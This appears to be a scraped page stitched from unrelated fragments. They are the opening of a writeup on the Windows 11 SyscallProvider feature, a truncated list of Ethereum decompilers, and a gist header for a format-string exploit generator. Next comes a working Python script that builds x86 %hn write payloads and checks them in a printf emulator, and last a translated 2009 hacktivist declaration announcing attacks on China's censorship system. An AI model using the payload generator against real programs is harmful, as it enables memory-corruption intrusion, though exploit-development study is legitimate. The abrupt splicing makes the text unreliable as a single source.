Tommy Jerry Mairo (TommyJerryMairo)

Syscall Provider

Background

SyscallProvider is a feature available from Windows 11 22H2 that allows inline hooking of syscalls.
This unfinished research was done on Windows 11 22H2. The feature is entirely undocumented at the moment, and it appears to be restricted to Microsoft-signed drivers.
All of the information here was gathered by manually reverse engineering securekernel.exe, skci.dll and ntoskrnl.exe.
The kernel exports three functions for working with the new feature: PsRegisterSyscallProvider, PsQuerySyscallProviderInformation and PsUnregisterSyscallProvider.
This writeup explores how the feature is initialized, how it works internally, and how to interact with and use it.

  • Panoramix is probably the most well-known one, thanks to etherscan.io integrating it. It returns "Python-like" code that is actually quite nice to read. Unfortunately it often runs into "timeouts", causing the decompiled code to stop abruptly.
  • Dedaub's Decompiler is my personal favorite. When it produces something, it produces "Solidity-like" code that is very readable. But sometimes it fails to yield anything at all, and even when it does work it struggles whenever memory handling gets involved, requiring some educated guessing.
  • ethervm.io's Decompiler is another online service which, like Panoramix, always delivers a result, but it also tends to skip big parts of the code due to "could not resolve jump destination" errors and the like.
  • Heimdall does not have an online s
@mgeeky
mgeeky / format_string_vuln_gen.py
Last active May 17, 2025 05:06
Format string vulnerability input generator, used during the exploit-development stage to construct stable x86 (32-bit) input vectors.
#!/usr/bin/python
#
# Script intended to aid the exploit-development process while attacking
# format string vulnerabilities. This script attempts to generate a
# stable format string to supply to the vulnerable program that would
# overwrite the specified address with the specified shellcode. Generating
# such a format string by hand is a tedious task, so this script makes it easier.
# Technical info:
# - x86/32-bit only, although it would be easy to extend to 64-bit (todo)
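As an added example, not mgeeky's script and not code from the gist: a minimal generator for the same x86 32-bit technique, writing a 32-bit value through two positional `%hn` short writes, together with a small printf emulator that replays the payload offline so the padding arithmetic can be checked before it is sent to a target. The target address, the value and the stack position (argument 7) are constructed sample inputs; on a real target the position of the buffer has to be found with a `%N$x` probe first.

```python
#!/usr/bin/env python3
"""Two-%hn write for a 32-bit format string bug, plus a tiny printf emulator
that replays the payload offline. Address, value and stack position used
below are constructed sample inputs, not taken from any real target."""
import re
import struct


def build_fmt_write(addr, value, arg_pos):
    """Return a payload that makes a vulnerable printf(buf) store the 32-bit
    `value` at `addr`. `arg_pos` is the 1-based positional argument at which
    the start of our buffer shows up on the stack ("%<arg_pos>$x" dumps it)."""
    ptrs = struct.pack("<II", addr, addr + 2)   # targets for low / high half
    if b"\x00" in ptrs or b"%" in ptrs:
        # A NUL byte ends the format string early and '%' starts a directive,
        # so such addresses need a different layout (e.g. pointers at the end).
        raise ValueError("target address contains a 0x00 or 0x25 byte")
    lo, hi = value & 0xFFFF, (value >> 16) & 0xFFFF
    # Little-endian: addr..addr+1 receives the low half via the pointer at
    # arg_pos, addr+2..addr+3 the high half via the pointer at arg_pos + 1.
    # Writing in ascending order means the byte counter only has to grow.
    writes = sorted([(lo, arg_pos), (hi, arg_pos + 1)])
    printed = len(ptrs)                 # the pointer bytes are echoed first
    fmt = b""
    for target, pos in writes:
        pad = (target - printed) % 0x10000
        if pad:
            fmt += b"%%%d$%dc" % (pos, pad)   # "%pos$<pad>c" emits exactly pad bytes
            printed += pad
        fmt += b"%%%d$hn" % pos               # store low 16 bits of the byte count
    return ptrs + fmt


DIRECTIVE = re.compile(rb"%(\d+)\$(\d*)(hn|c)")


def simulate_printf(payload, arg_pos, memory):
    """Emulate printf(payload) on 32-bit x86 when the format string itself is
    the buffer reached at positional argument `arg_pos`. Only the directives
    the generator emits are understood. `memory` is a dict address -> byte
    that %hn writes into. Returns the number of bytes printf would print."""
    def arg(pos):                       # dword found at positional argument pos
        return struct.unpack_from("<I", payload, (pos - arg_pos) * 4)[0]

    count, i = 0, 0
    while i < len(payload):
        if payload[i:i + 1] != b"%":
            count += 1                  # literal byte (pointer bytes included)
            i += 1
            continue
        m = DIRECTIVE.match(payload, i)
        if not m:
            raise ValueError("unsupported directive at offset %d" % i)
        pos = int(m.group(1))
        if m.group(3) == b"c":
            count += max(int(m.group(2) or b"1"), 1)   # width pads to pad bytes
        else:
            target = arg(pos)           # %hn: 16-bit store through the pointer
            memory[target] = count & 0xFF
            memory[target + 1] = (count >> 8) & 0xFF
        i = m.end()
    return count


def read_dword(memory, addr):
    """Little-endian 32-bit read from the emulated memory (unwritten bytes are 0)."""
    return struct.unpack("<I", bytes(memory.get(addr + k, 0) for k in range(4)))[0]


if __name__ == "__main__":
    # Constructed sample: writable slot at 0x0804a01c, our buffer at argument 7.
    ADDR, VALUE, ARG_POS = 0x0804A01C, 0xDEADBEEF, 7
    payload = build_fmt_write(ADDR, VALUE, ARG_POS)
    mem = {}
    n = simulate_printf(payload, ARG_POS, mem)
    print(payload, "-> prints %d bytes, writes 0x%08x" % (n, read_dword(mem, ADDR)))
```

Everything is positional (`%N$...c` and `%N$hn`), so the padding directives do not consume stack arguments and the offsets stay stable; mixing positional and non-positional conversions in one format string is undefined behaviour. The NUL/`%` check is the caveat that bites most often in practice: an address such as 0x08040000 cannot be placed at the front of the buffer this way.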
@idealhack
idealhack / 2009.md
Last active June 10, 2024 16:33
2009 Declaration of the Anonymous Netizens

Hello, Internet censorship department of the Chinese government. We are the Anonymous Netizens. For a long time we have watched what you have done to the Internet. Your groundless blocking of free speech on the Internet, your hostility toward advanced Internet technology, your collusion with the propaganda mouthpieces to distort the truth, your use of Internet commentators to poison online opinion: all of these are deeply etched in our memory. With your recent notice mandating the installation of Green Dam and the release of your vicious slander against Google, your sinister intent to fully control and fully censor the Internet has been laid bare before the people. We, the Anonymous Netizens, hereby decide that from July 1, 2009 we will launch a full-scale attack, worldwide, on the Internet censorship system under your control.

To defend the freedom of the Internet, to advance the networking of humanity, and also for the sake of our own online rights, we will systematically sabotage your Internet censorship system and show how insignificant your so-called censorship system is before the real power of the network. We regard you as public enemy number one of the Internet. What we launch against you will be a protracted war. However you use your propaganda mouthpieces to fool public opinion, you will ultimately be drowned in the vast ocean of a people's war. Your rigid propaganda methods, your Cultural Revolution-style sloganeering, your ignorance of the Internet, your hypocritical talk of "for the sake of the next generation": all of these sound the death knell of your complete defeat. You have nowhere to flee, because we are everywhere. The state's machinery of violence cannot save you, because for every one of our members who falls, ten new members join. We are well aware that you will use your usual class-struggle tricks: in your deceitful propaganda you will label us "the masses who do not know the truth" to draw a line between us and ordinary people, then label us "a small number of lawbreakers" to draw a line within our ranks, and finally pick us off one by one. To us, this is acceptable. In fact, it is what we encourage. The reason is simple: the more you view your people this way, the more self-evident the beauty of your emperor's new clothes becomes.

As humanity's networked civilization develops, the outdated ideology of the dominant ruling class, hostile to networking, gradually becomes an obstacle to historical progress. The slander and oppression that the old ideological forces direct at the emerging network forces, their hostility toward and blockade of the online world, all show their fear of the tide of history, and will all become their final struggle before they exit the stage of history. Those who vainly try to stand like a mantis before the wheel of history will in the end be swept into the dustbin of history. Even though your blood is slowly being replenished by digital immigrants, in the foreseeable future you will still be unable to understand the network. We will savor your decades-unchanged conspiracy theories about dissenters and your Cultural Revolution slogan-style prose, because we too can feel nostalgic; we will also laugh at your attempts to draw national borders on the Internet, because foolish acts have always been the comic relief of the history books. But we can sincerely tell you this:

No one wants to overthrow your regime; we have no interest whatsoever in your outdated notion of a regime or your rotten pickled ideology. You cannot understand why grand narratives dissolve before the historical tide of humanity's networking, nor can you understand why the concepts of state and nation will fall apart, you cannot